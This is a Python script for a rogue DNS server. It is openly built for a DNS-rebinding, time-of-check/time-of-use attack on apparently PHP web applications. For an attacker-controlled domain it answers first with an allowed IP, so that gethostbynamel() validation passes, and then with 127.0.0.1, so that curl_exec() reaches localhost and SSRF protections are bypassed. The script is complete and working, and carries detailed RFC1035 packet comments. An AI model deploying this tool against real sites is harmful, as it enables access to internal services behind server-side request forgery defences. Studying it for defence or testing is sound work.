# All references refer to RFC1035 (link: http://tools.ietf.org/html/rfc1035)
import socketserver
import sys
import time


# This variable is used to manage the verbosity of the script.
DEBUG = 0

# The DNS request header is 12 bytes long:
DNS_HEADER_LENGTH = 12

# This variable is the domain name for which we will return responses.
ROGUE_DOMAIN = "DOMAIN_UNDER_OUR_CONTROL"

# This variable contains the IP returned within the response.
IP = [
    "XXX.XXX.XXX.XXX", # IP returned when gethostbynamel() tries to resolve the domain.
    "127.0.0.1" # IP returned when curl_exec() tries to resolve the domain.
]

# This variable is used to control the status of the TOC TOU exploitation.
TOC_TOU_CHECK = 0


class RogueDNS(socketserver.BaseRequestHandler):
    def handle(self):
        data = self.request[0].strip()
        # If the request does not contain a complete header, the request is
        # considered invalid and it is not answered.
        if len(data) < DNS_HEADER_LENGTH:
            if DEBUG:
                print(
                    "[x] DNS header length is invalid " +
                    f"(less than {DNS_HEADER_LENGTH} bytes)."
                )
            return

        # We try to parse the request to extract all the questions. If the query
        # is invalid, it is not answered.
        try:
            questions = self.extract_questions(data)
        except Exception as e:
            if DEBUG:
                print(f"[x] Exception raised when parsing questions ({e}).")
            return
        # Once the questions have been parsed, only type QTYPE=A(1) and class
        # QCLASS=IN(1) questions will be answered.
        accepted_questions = []
        for question in questions:
            name = str(b".".join(question["QNAME"]), encoding="UTF-8")
            if question["QTYPE"] == b"\x00\x01":
                if question["QCLASS"] == b"\x00\x01":
                    if name == ROGUE_DOMAIN:
                        print(f"[+] Question accepted for domain: {name}")
                        accepted_questions.append(question)
                    else:
                        if DEBUG:
                            print(f"[-] Question QNAME for domain {name} not managed")
                else:
                    if DEBUG:
                        print(f"[-] Question QCLASS for domain {name} not managed")
            else:
                if DEBUG:
                    print(f"[-] Question QTYPE for domain {name} not managed")

        if accepted_questions:
            r_header = self.response_header(data)
            r_questions = self.response_questions(accepted_questions)
            r_answers = self.response_answers(accepted_questions)
            response = r_header + r_questions + r_answers
        else:
            response = b"\x00"*12
        socket = self.request[1]
        time.sleep(1)
        socket.sendto(response, self.client_address)

    def extract_questions(self, data):
        questions = []

        if DEBUG:
            print(f"[*] Parsing header section ...")
        # From: 4.1.1. Header section format
        #                                    1  1  1  1  1  1
        #      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                      ID                       |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    QDCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    ANCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    NSCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    ARCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        id = data[0:2].hex()
        qdcount = data[5]
        if DEBUG:
            print(f"\t- ID: {id}")
            print(f"\t- QDCOUNT: {qdcount}")

        if DEBUG:
            print(f"[*] Parsing question section ...")
        # From: 4.1.2. Question section format
        #                                    1  1  1  1  1  1
        #      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                                               |
        #    /                     QNAME                     /
        #    /                                               /
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                     QTYPE                     |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                     QCLASS                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        pointer = DNS_HEADER_LENGTH
        for _ in range(qdcount):
            question = {
                "QNAME": [],
                "QTYPE": "",
                "QCLASS": "",
            }
            length = data[pointer]
            # Read each label from QNAME part.
            while length != 0:
                start = pointer + 1
                end = pointer + length + 1
                question["QNAME"].append(data[start:end])
                pointer += length + 1
                length = data[pointer]
            question["QTYPE"] = data[pointer+1:pointer+3]
            question["QCLASS"] = data[pointer+3:pointer+5]
            pointer += 5
            if DEBUG:
                print(f"\t\t- QNAME: {question['QNAME']}")
                print(f"\t\t- QTYPE: {question['QTYPE']}")
                print(f"\t\t- QCLASS: {question['QCLASS']}")
            questions.append(question)
        return questions

    def response_header(self, data):
        if DEBUG:
            print(f"[*] Generation of header section ...")
        # From: 4.1.1. Header section format
        #                                    1  1  1  1  1  1
        #      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                      ID                       |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    QDCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    ANCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    NSCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                    ARCOUNT                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+

        # ID: A 16 bit identifier assigned by the program that generates any kind
        # of query. This identifier is copied the corresponding reply and can be
        # used by the requester to match up replies to outstanding queries.
        id = data[:2]
        # QR: A one bit field that specifies whether this message is a query (0),
        # or a response (1).
        #    - QR = 1 (response)
        # OPCODE: A four bit field that specifies kind of query in this message.
        # This value is set by the originator of a query and copied into the
        # response.
        #    - OPCODE = 0000 (standard query)
        # AA: Authoritative Answer - this bit is valid in responses, and specifies
        # that the responding name server is an authority for the domain name in
        # question section.
        #    - AA = 0 (not authoritative)
        # TC: TrunCation - specifies that this message was truncated due to length
        # greater than that permitted on the transmission channel.
        #    - TC = 0 (not truncated)
        # RD: Recursion Desired - this bit may be set in a query and is copie
        # into the response. If RD is set, it directs the name server to pursue
        # the query recursively. Recursive query support is optional.
        #    - RD = 0 (recursion not desired)
        # RA: Recursion Available - this be is set or cleared in a response, and
        # denotes whether recursive query support is available in the name server.
        #    - RA = 0 (recursion not available)
        # Z: Reserved for future use.  Must be zero in all queries and responses.
        #    - Z = 000 (unused)
        # RCODE: Response code - this 4 bit field is set as part of responses.
        #    - RCODE = 0000 (no error condition)
        qr_opcode_aa_tc_rd_ra_z_rcode = b"\x80\x00"
        # QDCOUNT - question entries count, set to QDCOUNT from request
        qdcount = data[4:6]
        # ANCOUNT - answer records count, set to QDCOUNT from request
        ancount = data[4:6]
        # NSCOUNT - authority records count, set to 0
        nscount = b"\x00\x00"
        # ARCOUNT - additional records count, set to 0
        arcount = b"\x00\x00"

        header = id + qr_opcode_aa_tc_rd_ra_z_rcode + qdcount + ancount + nscount + arcount
        if DEBUG:
            print(f"\t- Header section length: {len(header)}")
        return header

    def response_questions(self, questions):
        sections = b""
        for question in questions:
            section = b""
            for label in question["QNAME"]:
                # Length octet
                section += bytes([len(label)])
                section += label
            # Zero length octet
            section += b"\x00"
            section += question["QTYPE"]
            section += question["QCLASS"]
            sections += section
        return sections

    def response_answers(self, questions):
        global TOC_TOU_CHECK

        # From: 4.1.3. Resource record format
        #                                    1  1  1  1  1  1
        #      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                                               |
        #    /                                               /
        #    /                      NAME                     /
        #    |                                               |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                      TYPE                     |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                     CLASS                     |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                      TTL                      |
        #    |                                               |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        #    |                   RDLENGTH                    |
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
        #    /                     RDATA                     /
        #    /                                               /
        #    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        records = b""
        for question in questions:
            name = b""
            # NAME: A domain name represented as a sequence of labels, where
            # each label consists of a length octet followed by that number of
            # octets.
            for label in question["QNAME"]:
                # Label's length.
                name += bytes([len(label)])
                # Label.
                name += label
            # The domain name terminates with the zero length octet for the null
            # label of the root.  Note that this field may be an odd number of
            # octets; no padding is used.
            name += b"\x00"

            # TYPE: Two octets containing one of the RR type codes. This field
            # specifies the meaning of the data in the RDATA field.
            type_ = question["QTYPE"]
            # CLASS: Two octets which specify the class of the data in the RDATA
            # field.
            class_ = question["QCLASS"]
            # TTL: A 32 bit unsigned integer that specifies the time interval
            # (in seconds) that the resource record may be cached before it
            # should be discarded. Zero values are interpreted to mean that the
            # RR can only be used for the transaction in progress, and should
            # not be cached.
            ttl = b"\x00\x00\x00\x00"
            # RDLENGTH: An unsigned 16 bit integer that specifies the length in
            # octets of the RDATA field. In case of QTYPE=A and QCLASS=IN,
            # RDLENGTH=4.
            rdlength = b"\x00\x04"

            # We return the IP according to the conditions that suit us.
            if TOC_TOU_CHECK % 2 == 0:
                ip = IP[0]
                print(f"[+] We answer with a legit IP: {ip}")
            else:
                ip = IP[1]
                print(f"[+] We answer with a supposedly forbidden IP: {ip}")
            TOC_TOU_CHECK += 1

            # RDATA: A variable length string of octets that describes the
            # resource. The format of this information varies according to the
            # TYPE and CLASS of the resource record. For example, the if the
            # TYPE is A and the CLASS is IN, the RDATA field is a 4 octet ARPA
            # Internet address.
            rdata = b"".join(map(lambda x: bytes([int(x)]), ip.split(".")))

            # The answer, authority, and additional sections all share the same
            # format: a variable number of resource records, where the number of
            # records is specified in the corresponding count field in the header.
            record = name + type_ + class_ + ttl + rdlength + rdata

            records += record
        return records


if __name__ == "__main__":
    host, port = "", 53
    server = socketserver.ThreadingUDPServer((host, port), RogueDNS)
    print(f"[*] Started DNS server on port {port}")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        server.shutdown()
        sys.exit(0)